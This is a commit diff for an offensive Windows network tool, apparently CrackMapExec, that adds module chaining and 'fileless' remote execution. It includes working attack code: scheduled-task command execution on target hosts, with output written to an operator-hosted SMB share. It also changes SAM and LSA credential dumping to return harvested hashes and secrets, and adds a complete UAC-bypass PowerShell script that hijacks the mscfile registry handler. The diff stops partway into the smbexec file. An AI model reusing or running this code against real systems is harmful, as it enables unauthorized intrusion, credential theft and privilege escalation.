Initial implementation of module chaining

Oook, this commit is basicallu just so I can start tracking (and
testing) all of the changes made so far:

- All execution methods are now completely fileless, all output and/or batch
  files get outputted/hosted locally on a SMB server that gets spun up on runtime

- Module structure has been modified for module chaining

- Module chaining implementation is currently very hacky, I definitly
  have to figure out something more elegant but for now it
  works. Module chaining is performed via the -MC flag and has it's own
  mini syntax (will be adding it to the wiki)

- You can now specify credential ID ranges using the -id flag
- Added the eventvwr_bypass and rundll32_exec modules
- Renamed a lot of the modules for naming consistency

TODO:

- Launchers/Payloads need to be escaped before being generated when
  module chaining

- Add check for modules 'required_server' attribute
- Finish modifying the functions in the Connection object so they return
  the results

cme/cmechainserver.py

@@ -0,0 +1,109 @@
+import BaseHTTPServer
+import threading
+import ssl
+import os
+import sys
+from BaseHTTPServer import BaseHTTPRequestHandler
+from logging import getLogger
+from gevent import sleep
+from cme.helpers import highlight
+from cme.logger import CMEAdapter
+from cme.cmeserver import CMEServer
+
+class RequestHandler(BaseHTTPRequestHandler):
+
+    def log_message(self, format, *args):
+        module = self.server.host_chain[self.client_address[0]][0]
+        server_logger = CMEAdapter(getLogger('CME'), {'module': module.name.upper(), 'host': self.client_address[0]})
+        server_logger.info("- - %s" % (format%args))
+
+    def do_GET(self):
+        current_module = self.server.host_chain[self.client_address[0]][0]
+
+        if hasattr(current_module, 'on_request'):
+
+            module_list = self.server.host_chain[self.client_address[0]][:]
+            module_list.reverse()
+
+            final_launcher = module_list[0].launcher(self.server.context, None if not hasattr(module_list[0], 'command') else module_list[0].command)
+            if len(module_list) > 2:
+                for module in module_list:
+                    if module == current_module or module == module_list[0]:
+                        continue
+
+                    server_logger = CMEAdapter(getLogger('CME'), {'module': module.name.upper(), 'host': self.client_address[0]})
+                    self.server.context.log = server_logger
+                    
+                    final_launcher = module.launcher(self.server.context, final_launcher)
+
+            server_logger = CMEAdapter(getLogger('CME'), {'module': current_module.name.upper(), 'host': self.client_address[0]})
+            self.server.context.log = server_logger
+
+            if current_module == module_list[0]: final_launcher = None if not hasattr(module_list[0], 'command') else module_list[0].command
+
+            launcher = current_module.launcher(self.server.context, final_launcher)
+            payload  = current_module.payload(self.server.context, final_launcher)
+
+            current_module.on_request(self.server.context, self, launcher, payload)
+
+            if not hasattr(current_module, 'on_response'):
+                try:
+                    del self.server.host_chain[self.client_address[0]][0]
+                except KeyError or IndexError:
+                    pass
+
+    def do_POST(self):
+        self.server.log.debug(self.server.host_chain)
+        module = self.server.host_chain[self.client_address[0]][0]
+
+        if hasattr(module, 'on_response'):
+            server_logger = CMEAdapter(getLogger('CME'), {'module': module.name.upper(), 'host': self.client_address[0]})
+            self.server.context.log = server_logger
+            module.on_response(self.server.context, self)
+
+            try:
+                del self.server.host_chain[self.client_address[0]][0]
+            except KeyError or IndexError:
+                pass
+
+    def stop_tracking_host(self):
+        '''
+            This gets called when a module has finshed executing, removes the host from the connection tracker list
+        '''
+        if len(self.server.host_chain[self.client_address[0]]) == 1:
+            try:
+                self.server.hosts.remove(self.client_address[0])
+                del self.server.host_chain[self.client_address[0]]
+            except ValueError:
+                pass
+
+class CMEChainServer(CMEServer):
+
+    def __init__(self, chain_list, context, logger, srv_host, port, server_type='https'):
+
+        try:
+            threading.Thread.__init__(self)
+
+            self.server = BaseHTTPServer.HTTPServer((srv_host, int(port)), RequestHandler)
+            self.server.hosts   = []
+            self.server.host_chain = {}
+            self.server.chain_list = chain_list
+            self.server.context = context
+            self.server.log     = context.log
+            self.cert_path      = os.path.join(os.path.expanduser('~/.cme'), 'cme.pem')
+
+            if server_type == 'https':
+                self.server.socket = ssl.wrap_socket(self.server.socket, certfile=self.cert_path, server_side=True)
+
+        except Exception as e:
+            errno, message = e.args
+            if errno == 98 and message == 'Address already in use':
+                logger.error('Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port')
+            else:
+                logger.error('Error starting HTTP(S) server: {}'.format(message))
+
+            sys.exit(1)
+
+    def track_host(self, host_ip):
+        self.server.hosts.append(host_ip)
+        self.server.host_chain[host_ip] = [module['object'] for module in self.server.chain_list]

cme/cmeserver.py

@@ -3,7 +3,6 @@ import threading
 import ssl
 import os
 import sys
-from getpass import getuser
 from BaseHTTPServer import BaseHTTPRequestHandler
 from logging import getLogger
 from gevent import sleep
@@ -20,7 +19,11 @@ class RequestHandler(BaseHTTPRequestHandler):
         if hasattr(self.server.module, 'on_request'):
             server_logger = CMEAdapter(getLogger('CME'), {'module': self.server.module.name.upper(), 'host': self.client_address[0]})
             self.server.context.log = server_logger
-            self.server.module.on_request(self.server.context, self)
+            
+            launcher = self.server.module.launcher(self.server.context, None if not hasattr(self.server.module, 'command') else self.server.module.command)
+            payload  = self.server.module.payload(self.server.context, None if not hasattr(self.server.module, 'command') else self.server.module.command)
+            
+            self.server.module.on_request(self.server.context, self, launcher, payload)
 
     def do_POST(self):
         if hasattr(self.server.module, 'on_response'):
@@ -41,10 +44,6 @@ class CMEServer(threading.Thread):
 
     def __init__(self, module, context, logger, srv_host, port, server_type='https'):
 
-        if port <= 1024 and os.geteuid() != 0:
-            logger.error("I'm sorry {}, I'm afraid I can't let you do that".format(getuser()))
-            sys.exit(1)
-
         try:
             threading.Thread.__init__(self)
 
@@ -61,15 +60,18 @@ class CMEServer(threading.Thread):
         except Exception as e:
             errno, message = e.args
             if errno == 98 and message == 'Address already in use':
-                logger.error('Error starting CME server: the port is already in use, try specifying a diffrent port using --server-port')
+                logger.error('Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port')
             else:
-                logger.error('Error starting CME server: {}'.format(message))
+                logger.error('Error starting HTTP(S) server: {}'.format(message))
 
             sys.exit(1)
 
     def base_server(self):
         return self.server
 
+    def track_host(self, host_ip):
+        self.server.hosts.append(host_ip)
+
     def run(self):
         try: 
             self.server.serve_forever()

cme/cmesmbserver.py

@@ -0,0 +1,50 @@
+import threading
+import logging
+import sys
+import os
+from impacket import smbserver
+
+class CMESMBServer(threading.Thread):
+
+    def __init__(self, logger, share_name, verbose=False):
+
+        try:
+            threading.Thread.__init__(self)
+
+            self.server = smbserver.SimpleSMBServer()
+            self.server.addShare(share_name.upper(), os.path.join('/tmp', 'cme_hosted'))
+            if verbose: self.server.setLogFile('')
+            self.server.setSMB2Support(False)
+            self.server.setSMBChallenge('')
+
+        except Exception as e:
+            errno, message = e.args
+            if errno == 98 and message == 'Address already in use':
+                logger.error('Error starting SMB server: the port is already in use')
+            else:
+                logger.error('Error starting SMB server: {}'.format(message))
+
+            sys.exit(1)
+
+    def run(self):
+        try: 
+            self.server.start()
+        except: 
+            pass
+
+    def shutdown(self):
+        #try:
+        #    while len(self.server.hosts) > 0:
+        #        self.server.log.info('Waiting on {} host(s)'.format(highlight(len(self.server.hosts))))
+        #        sleep(15)
+        #except KeyboardInterrupt:
+        #    pass
+
+        self._Thread__stop()
+        # make sure all the threads are killed
+        for thread in threading.enumerate():
+            if thread.isAlive():
+                try:
+                    thread._Thread__stop()
+                except:
+                    pass

cme/connection.py

@@ -41,12 +41,14 @@ def requires_admin(func):
 
 class Connection:
 
-    def __init__(self, args, db, host, module, cmeserver):
+    def __init__(self, args, db, host, module, chain_list, cmeserver, share_name):
         self.args = args
         self.db = db
         self.host = host
         self.module = module
+        self.chain_list = chain_list
         self.cmeserver = cmeserver
+        self.share_name = share_name
         self.conn = None
         self.hostname = None
         self.domain = None
@@ -148,9 +150,13 @@ class Connection:
 
             self.login()
 
-            if ((self.password is not None or self.hash is not None) and self.username is not None):
+            if (self.password is not None or self.hash is not None) and self.username is not None:
+
+                if self.module or self.chain_list:
+
+                    if self.chain_list:
+                        module = self.chain_list[0]['object']
 
-                if self.module:
                     module_logger = CMEAdapter(getLogger('CME'), {
                                                                   'module': module.name.upper(), 
                                                                   'host': self.host, 
@@ -163,13 +169,42 @@ class Connection:
                     if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
                         cmeserver.server.context.localip = local_ip
 
+                    if self.module:
+
+                        launcher = module.launcher(context, None if not hasattr(module, 'command') else module.command)
+                        payload = module.payload(context, None if not hasattr(module, 'command') else module.command)
+
+                        if hasattr(module, 'on_login'):
+                            module.on_login(context, self, launcher, payload)
+
+                        if self.admin_privs and hasattr(module, 'on_admin_login'):
+                            module.on_admin_login(context, self, launcher, payload)
+
+                    elif self.chain_list:
+                        module_list = self.chain_list[:]
+                        module_list.reverse()
+
+                        final_launcher = module_list[0]['object'].launcher(context, None if not hasattr(module_list[0]['object'], 'command') else module_list[0]['object'].command)
+                        if len(module_list) > 2:
+                            for m in module_list:
+                                if m['object'] == module or m['object'] == module_list[0]['object']:
+                                    continue
+                                
+                                final_launcher = m['object'].launcher(context, final_launcher)
+
+                        if module == module_list[0]['object']: 
+                            final_launcher = None if not hasattr(module_list[0]['object'], 'command') else module_list[0]['object'].command
+                        
+                        launcher = module.launcher(context, final_launcher)
+                        payload  = module.payload(context, final_launcher)
+
                         if hasattr(module, 'on_login'):
                             module.on_login(context, self)
 
-                    if hasattr(module, 'on_admin_login') and self.admin_privs:
+                        if self.admin_privs and hasattr(module, 'on_admin_login'):
-                        module.on_admin_login(context, self)
+                            module.on_admin_login(context, self, launcher, payload)
 
-                elif self.module is None:
+                elif self.module is None and self.chain_list is None:
                     for k, v in vars(self.args).iteritems():
                         if hasattr(self, k) and hasattr(getattr(self, k), '__call__'):
                             if v is not False and v is not None:
@@ -345,16 +380,16 @@ class Connection:
         for cred_id in self.args.cred_id:
             with sem:
                 try:
-                    c_id, credtype, domain, username, password = self.db.get_credentials(filterTerm=cred_id)[0]
+                    c_id, credtype, domain, username, password = self.db.get_credentials(filterTerm=int(cred_id))[0]
 
                     if not domain: domain = self.domain
                     if self.args.domain: domain = self.args.domain
 
                     if credtype == 'hash' and not self.over_fail_limit(username):
-                        self.hash_login(domain, username, password)
+                        if self.hash_login(domain, username, password): return
 
                     elif credtype == 'plaintext' and not self.over_fail_limit(username):
-                        self.plaintext_login(domain, username, password)
+                        if self.plaintext_login(domain, username, password): return
      
                 except IndexError:
                     self.logger.error("Invalid database credential ID!")
@@ -442,7 +477,7 @@ class Connection:
 
                 if method == 'wmiexec':
                     try:
-                        exec_method = WMIEXEC(self.host, self.username, self.password, self.domain, self.conn, self.hash, self.args.share)
+                        exec_method = WMIEXEC(self.host, self.share_name, self.username, self.password, self.domain, self.conn, self.hash, self.args.share)
                         logging.debug('Executed command via wmiexec')
                         break
                     except:
@@ -452,7 +487,7 @@ class Connection:
 
                 elif method == 'atexec':
                     try:
-                        exec_method = TSCH_EXEC(self.host, self.username, self.password, self.domain, self.hash) #self.args.share)
+                        exec_method = TSCH_EXEC(self.host, self.share_name, self.username, self.password, self.domain, self.hash) #self.args.share)
                         logging.debug('Executed command via atexec')
                         break
                     except:
@@ -462,7 +497,7 @@ class Connection:
 
                 elif method == 'smbexec':
                     try:
-                        exec_method = SMBEXEC(self.host, self.args.smb_port, self.username, self.password, self.domain, self.hash, self.args.share)
+                        exec_method = SMBEXEC(self.host, self.share_name, self.args.smb_port, self.username, self.password, self.domain, self.hash, self.args.share)
                         logging.debug('Executed command via smbexec')
                         break
                     except:
@@ -470,9 +505,7 @@ class Connection:
                         logging.debug(format_exc())
                         continue
 
-        if self.cmeserver:
+        if self.cmeserver: self.cmeserver.track_host(self.host)
-            if hasattr(self.cmeserver.server.module, 'on_request') or hasattr(self.cmeserver.server.module, 'on_response'):
-                self.cmeserver.server.hosts.append(self.host)
 
         output = u'{}'.format(exec_method.execute(payload, get_output).strip().decode('utf-8'))
 
@@ -502,7 +535,9 @@ class Connection:
 
     @requires_admin
     def ntds(self):
-        return DumpSecrets(self).NTDS_dump()
+        #We could just return the whole NTDS.dit database but in large domains it would be huge 
+        #and would take up too much memory
+        DumpSecrets(self).NTDS_dump()
 
     @requires_admin
     def wdigest(self):

cme/crackmapexec.py

@@ -10,10 +10,14 @@ from argparse import RawTextHelpFormatter
 from cme.connection import Connection
 from cme.database import CMEDatabase
 from cme.logger import setup_logger, setup_debug_logger, CMEAdapter
-from cme.helpers import highlight
+from cme.helpers import highlight, gen_random_string
 from cme.targetparser import parse_targets
 from cme.moduleloader import ModuleLoader
+from cme.modulechainloader import ModuleChainLoader
+from cme.cmesmbserver import CMESMBServer
 from cme.first_run import first_run_setup
+from getpass import getuser
+from pprint import pformat
 import sqlite3
 import argparse
 import os
@@ -56,7 +60,7 @@ def main():
 
     parser.add_argument("target", nargs='*', type=str, help="The target IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containg a list of targets")
     parser.add_argument("-t", type=int, dest="threads", default=100, help="Set how many concurrent threads to use (default: 100)")
-    parser.add_argument('-id', metavar="CRED_ID", nargs='*', default=[], type=int, dest='cred_id', help='Database credential ID(s) to use for authentication')
+    parser.add_argument('-id', metavar="CRED_ID", nargs='*', default=[], type=str, dest='cred_id', help='Database credential ID(s) to use for authentication')
     parser.add_argument("-u", metavar="USERNAME", dest='username', nargs='*', default=[], help="Username(s) or file(s) containing usernames")
     ddgroup = parser.add_mutually_exclusive_group()
     ddgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, help="Domain name")
@@ -64,7 +68,9 @@ def main():
     msgroup = parser.add_mutually_exclusive_group()
     msgroup.add_argument("-p", metavar="PASSWORD", dest='password', nargs= '*', default=[], help="Password(s) or file(s) containing passwords")
     msgroup.add_argument("-H", metavar="HASH", dest='hash', nargs='*', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
-    parser.add_argument("-M", "--module", metavar='MODULE', dest='module', help='Payload module to use')
+    mcgroup = parser.add_mutually_exclusive_group()
+    mcgroup.add_argument("-M", "--module", metavar='MODULE', help='Payload module to use')
+    mcgroup.add_argument('-MC','--module-chain', metavar='CHAIN_COMMAND', help='Payload module chain command string to run')
     parser.add_argument('-o', metavar='MODULE_OPTION', nargs='*', default=[], dest='module_options', help='Payload module options')
     parser.add_argument('-L', '--list-modules', action='store_true', help='List available modules')
     parser.add_argument('--show-options', action='store_true', help='Display module options')
@@ -132,17 +138,24 @@ def main():
     cme_path = os.path.expanduser('~/.cme')
 
     module     = None
+    chain_list = None
     server     = None
     context    = None
+    smb_server = None
+    share_name = gen_random_string(5).upper()
     targets    = []
     server_port_dict = {'http': 80, 'https': 443}
 
     args = parser.parse_args()
 
+    if os.geteuid() != 0:
+        logger.error("I'm sorry {}, I'm afraid I can't let you do that (cause I need root)".format(getuser()))
+        sys.exit(1)
+
     if args.verbose:
         setup_debug_logger()
 
-    logging.debug(vars(args))
+    logging.debug('Passed args:\n' + pformat(vars(args)))
 
     if not args.server_port:
         args.server_port = server_port_dict[args.server]
@@ -172,6 +185,14 @@ def main():
                 args.hash.remove(ntlm_hash)
                 args.hash.append(open(ntlm_hash, 'r'))
 
+    if args.cred_id:
+        for cred_id in args.cred_id:
+            if '-' in str(cred_id):
+                start_id, end_id = cred_id.split('-')
+                for n in range(int(start_id), int(end_id) + 1):
+                    args.cred_id.append(n)
+                args.cred_id.remove(cred_id)
+
     for target in args.target:
         if os.path.exists(target):
             with open(target, 'r') as target_file:
@@ -186,7 +207,7 @@ def main():
 
         if args.list_modules:
             for m in modules:
-                logger.info('{:<20} {}'.format(m, modules[m]['description']))
+                logger.info('{:<25} Chainable: {:<10} {}'.format(m, str(modules[m]['chain_support']), modules[m]['description']))
             sys.exit(0)
 
         elif args.module and args.show_options:
@@ -200,13 +221,20 @@ def main():
                 if args.module.lower() == m.lower():
                     module, context, server = loader.init_module(modules[m]['path'])
 
+    elif args.module_chain:
+        chain_list, server = ModuleChainLoader(args, db, logger).init_module_chain()
+
+    if args.execute or args.ps_execute or args.module or args.module_chain:
+        smb_server = CMESMBServer(logger, share_name, args.verbose)
+        smb_server.start()
+
     try:
         '''
             Open all the greenlet (as supposed to redlet??) threads 
             Whoever came up with that name has a fetish for traffic lights
         '''
         pool = Pool(args.threads)
-        jobs = [pool.spawn(Connection, args, db, str(target), module, server) for target in targets]
+        jobs = [pool.spawn(Connection, args, db, str(target), module, chain_list, server, share_name) for target in targets]
 
         #Dumping the NTDS.DIT and/or spidering shares can take a long time, so we ignore the thread timeout
         if args.ntds or args.spider:
@@ -220,4 +248,8 @@ def main():
     if server:
         server.shutdown()
 
+    if smb_server:
+        pass
+        #smb_server.shutdown()
+
     logger.info('KTHXBYE!')

cme/credentials/lsa.py

@@ -181,6 +181,8 @@ class LSASecrets(OfflineRegistry):
                 self.__cachedItems.append(answer)
                 self.__logger.highlight(answer)
 
+        return self.__cachedItems
+
     def __printSecret(self, name, secretItem):
         # Based on [MS-LSAD] section 3.1.1.4
 
@@ -302,6 +304,8 @@ class LSASecrets(OfflineRegistry):
 
                 self.__printSecret(key, secret)
 
+        return self.__secretItems
+
     def exportSecrets(self, fileName):
         if len(self.__secretItems) > 0:
             fd = codecs.open(fileName+'.secrets','w+', encoding='utf-8')

cme/credentials/sam.py

@@ -67,6 +67,7 @@ class SAMHashes(OfflineRegistry):
     def dump(self):
         NTPASSWORD = "NTPASSWORD\0"
         LMPASSWORD = "LMPASSWORD\0"
+        sam_hashes = []
 
         if self.__samFile is None:
             # No SAM file provided
@@ -114,8 +115,11 @@ class SAMHashes(OfflineRegistry):
             answer =  "%s:%d:%s:%s:::" % (userName, rid, hexlify(lmHash), hexlify(ntHash))
             self.__itemsFound[rid] = answer
             self.__logger.highlight(answer)
+            sam_hashes.append(answer)
             self.__db.add_credential('hash', self.__hostname, userName, '{}:{}'.format(hexlify(lmHash), hexlify(ntHash)))
 
+        return sam_hashes
+
     def export(self, fileName):
         if len(self.__itemsFound) > 0:
             items = sorted(self.__itemsFound)

cme/credentials/secretsdump.py

@@ -97,32 +97,47 @@ class DumpSecrets:
 
     def SAM_dump(self):
         self.enableRemoteRegistry()
+        sam_hashes = []
         try:
             SAMFileName         = self.__remoteOps.saveSAM()
-            self.__SAMHashes    = SAMHashes(SAMFileName, self.__bootKey, self.__logger, self.__db, self.__host, self.__hostname, isRemote = True)
+            self.__SAMHashes    = SAMHashes(SAMFileName, 
-            self.__SAMHashes.dump()
+                                            self.__bootKey, 
+                                            self.__logger, 
+                                            self.__db,
+                                            self.__host, 
+                                            self.__hostname, 
+                                            isRemote = True)
+            sam_hashes.extend(self.__SAMHashes.dump())
             self.__SAMHashes.export(self.__outputFileName)
         except Exception as e:
             traceback.print_exc()
             logging.error('SAM hashes extraction failed: %s' % str(e))
             
         self.cleanup()
+        return sam_hashes
 
     def LSA_dump(self):
         self.enableRemoteRegistry()
+        lsa_secrets = []
         try:
             SECURITYFileName = self.__remoteOps.saveSECURITY()
 
-            self.__LSASecrets = LSASecrets(SECURITYFileName, self.__bootKey, self.__logger, self.__remoteOps, isRemote=self.__isRemote)
+            self.__LSASecrets = LSASecrets(SECURITYFileName, 
-            self.__LSASecrets.dumpCachedHashes()
+                                           self.__bootKey, 
+                                           self.__logger, 
+                                           self.__remoteOps,
+                                           isRemote=self.__isRemote)
+
+            lsa_secrets.extend(self.__LSASecrets.dumpCachedHashes())
             self.__LSASecrets.exportCached(self.__outputFileName)
-            self.__LSASecrets.dumpSecrets()
+            lsa_secrets.extend(self.__LSASecrets.dumpSecrets())
             self.__LSASecrets.exportSecrets(self.__outputFileName)
         except Exception as e:
             traceback.print_exc()
             logging.error('LSA hashes extraction failed: %s' % str(e))
 
         self.cleanup()
+        return lsa_secrets
 
     def NTDS_dump(self, method, pwdLastSet, history):
         self.__pwdLastSet = pwdLastSet
@@ -158,10 +173,29 @@ class DumpSecrets:
     def cleanup(self):
         logging.info('Cleaning up... ')
         if self.__remoteOps:
+            try:
                 self.__remoteOps.finish()
+            except:
+                logging.debug('Error calling remoteOps.finish(), traceback:')
+                logging.debug(traceback.format_exc())
+
         if self.__SAMHashes:
+            try:
                 self.__SAMHashes.finish()
+            except:
+                logging.debug('Error calling SAMHashes.finish(), traceback:')
+                logging.debug(traceback.format_exc())
+
         if self.__LSASecrets:
+            try:
                 self.__LSASecrets.finish()
+            except:
+                logging.debug('Error calling LSASecrets.finish(), traceback:')
+                logging.debug(traceback.format_exc())
+
         if self.__NTDSHashes:
+            try:
                 self.__NTDSHashes.finish()
+            except:
+                logging.debug('Error calling NTDSHashes.finish(), traceback:')
+                logging.debug(traceback.format_exc())

cme/data/Invoke-EventVwrBypass.ps1

@@ -0,0 +1,82 @@
+function Invoke-EventVwrBypass {
+<#
+.SYNOPSIS
+
+Bypasses UAC by performing an image hijack on the .msc file extension
+Expected to work on Win7, 8.1 and Win10
+
+Only tested on Windows 7 and Windows 10
+
+Author: Matt Nelson (@enigma0x3)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.PARAMETER Command
+
+ Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
+
+.EXAMPLE
+
+Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
+
+This will write out "Is Elevated: True" to C:\UACBypassTest.
+
+#>
+
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
+    Param (
+        [Parameter(Mandatory = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Command,
+
+        [Switch]
+        $Force
+    )
+
+    $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
+    #Add in the new registry entries to hijack the msc file
+    if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
+        New-Item $mscCommandPath -Force |
+            New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
+    }else{
+        Write-Verbose "Key already exists, consider using -Force"
+        exit
+    }
+
+    if (Test-Path $mscCommandPath) {
+        Write-Verbose "Created registry entries to hijack the msc extension"
+    }else{
+        Write-Warning "Failed to create registry key, exiting"
+        exit
+    }
+    
+
+    $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
+
+    #Start Event Viewer
+    if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
+        $Process = Start-Process -FilePath $EventvwrPath -PassThru
+        Write-Verbose "Started eventvwr.exe"
+    }
+
+    #Sleep 5 seconds 
+    Write-Verbose "Sleeping 5 seconds to trigger payload"
+    if (-not $PSBoundParameters['WhatIf']) {
+        Start-Sleep -Seconds 5
+    }
+
+    $mscfilePath = "HKCU:\Software\Classes\mscfile"
+
+    if (Test-Path $mscfilePath) {
+        #Remove the registry entry
+        Remove-Item $mscfilePath -Recurse -Force
+        Write-Verbose "Removed registry entries"
+    }
+
+    if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
+        Stop-Process -Id $Process.Id
+        Write-Verbose "Killed running eventvwr process"
+    }
+}

cme/enum/shares.py

@@ -38,3 +38,5 @@ class ShareEnum:
                 self.logger.highlight(u'{:<15} {}'.format(share, 'NO ACCESS'))
             else:
                 self.logger.highlight(u'{:<15} {}'.format(share, ', '.join(perm)))
+
+        return self.permissions

cme/execmethods/atexec.py

@@ -1,14 +1,17 @@
+import os
+import logging
 from impacket.dcerpc.v5 import tsch, transport
 from impacket.dcerpc.v5.dtypes import NULL
 from cme.helpers import gen_random_string
 from gevent import sleep
 
 class TSCH_EXEC:
-    def __init__(self, target, username, password, domain, hashes=None):
+    def __init__(self, target, share_name, username, password, domain, hashes=None):
         self.__target = target
         self.__username = username
         self.__password = password
         self.__domain = domain
+        self.__share_name = share_name
         self.__lmhash = ''
         self.__nthash = ''
         self.__outputBuffer = ''
@@ -36,21 +39,22 @@ class TSCH_EXEC:
 
     def execute(self, command, output=False):
         self.__retOutput = output
-        self.doStuff(command)
+        self.execute_handler(command)
         return self.__outputBuffer
 
-    def doStuff(self, command):
+    def output_callback(self, data):
-        
-        def output_callback(data):
         self.__outputBuffer = data
 
-        dce = self.__rpctransport.get_dce_rpc()
+    def execute_handler(self, data):
+        if self.__retOutput:
+            try:
+                self.doStuff(data, fileless=True)
+            except:
+                self.doStuff(data)
+        else:
+            self.doStuff(data)
 
-        dce.set_credentials(*self.__rpctransport.get_credentials())
+    def gen_xml(self, command, tmpFileName, fileless=False):
-        dce.connect()
-        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
-        dce.bind(tsch.MSRPC_UUID_TSCHS)
-        tmpName = gen_random_string(8)
 
         xml = """<?xml version="1.0" encoding="UTF-16"?>
 <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
@@ -92,54 +96,79 @@ class TSCH_EXEC:
       <Command>cmd.exe</Command>
 """
         if self.__retOutput:
-            tmpFileName = tmpName + '.tmp'
+            if fileless:
-            xml+= """      <Arguments>/C {} &gt; %windir%\\Temp\\{} 2&gt;&amp;1</Arguments>
+                local_ip = self.__rpctransport.get_socket().getsockname()[0]
-    </Exec>
+                argument_xml = "      <Arguments>/C {} &gt; \\\\{}\\{}\\{} 2&gt;&amp;1</Arguments>".format(command, local_ip, self.__share_name, tmpFileName)
-  </Actions>
+            else:
-</Task>
+                argument_xml = "      <Arguments>/C {} &gt; %windir%\\Temp\\{} 2&gt;&amp;1</Arguments>".format(command, tmpFileName)
-        """.format(command, tmpFileName)
         
         elif self.__retOutput is False:
-            xml+= """      <Arguments>/C {}</Arguments>
+            argument_xml = "      <Arguments>/C {}</Arguments>".format(command)
+
+        logging.debug('Generated argument XML: ' + argument_xml)
+        xml += argument_xml
+
+        xml += """
     </Exec>
   </Actions>
 </Task>
-        """.format(command)
+"""
+        return xml
+
+    def doStuff(self, command, fileless=False):
+
+        dce = self.__rpctransport.get_dce_rpc()
+
+        dce.set_credentials(*self.__rpctransport.get_credentials())
+        dce.connect()
+        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
+        dce.bind(tsch.MSRPC_UUID_TSCHS)
+        tmpName = gen_random_string(8)
+        tmpFileName = tmpName + '.tmp'
+
+        xml = self.gen_xml(command, tmpFileName, fileless)
 
         #logging.info("Task XML: {}".format(xml))
         taskCreated = False
-        #logging.info('Creating task \\%s' % tmpName)
+        logging.info('Creating task \\%s' % tmpName)
         tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
         taskCreated = True
 
-        #logging.info('Running task \\%s' % tmpName)
+        logging.info('Running task \\%s' % tmpName)
         tsch.hSchRpcRun(dce, '\\%s' % tmpName)
 
         done = False
         while not done:
-            #logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
+            logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
             resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
             if resp['pLastRuntime']['wYear'] != 0:
                 done = True
             else:
                 sleep(2)
 
-        #logging.info('Deleting task \\%s' % tmpName)
+        logging.info('Deleting task \\%s' % tmpName)
         tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
         taskCreated = False
 
         if taskCreated is True:
             tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
 
-        peer = ':'.join(map(str, self.__rpctransport.get_socket().getpeername()))
-        #self.__logger.success('Executed command via ATEXEC')
-
         if self.__retOutput:
+            if fileless:
+                while True:
+                    try:
+                        with open(os.path.join('/tmp', 'cme_hosted', tmpFileName), 'r') as output:
+                            self.output_callback(output.read())
+                        break
+                    except IOError:
+                        sleep(2)
+            else:
+                peer = ':'.join(map(str, self.__rpctransport.get_socket().getpeername()))
                 smbConnection = self.__rpctransport.get_smb_connection()
                 while True:
                     try:
                         #logging.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName)
-                    smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
+                        smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, self.output_callback)
                         break
                     except Exception as e:
                         if str(e).find('SHARING') > 0:
@@ -150,8 +179,5 @@ class TSCH_EXEC:
                             raise
                 #logging.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName)
                 smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
-        else:
-            pass
-            #logging.info('Output retrieval disabled')
 
         dce.disconnect()

cme/execmethods/smbexec.py

@@ -1,4 +1,5 @@
 import logging
+import os
 from gevent import sleep
 from impacket.dcerpc.v5 import transport, scmr
 from impacket.smbconnection import *
@@ -6,8 +7,9 @@ from cme.helpers import gen_random_string
 
 class SMBEXEC:
 
-    def __init__(self, host, protocol, username = '', password = '', domain = '', hashes = None, share = None, port=445):
+    def __init__(self, host, share_name, protocol, username = '', password = '', domain = '', hashes = None, share = None, port=445):
         self.__host = host
+        self.__share_name = share_name
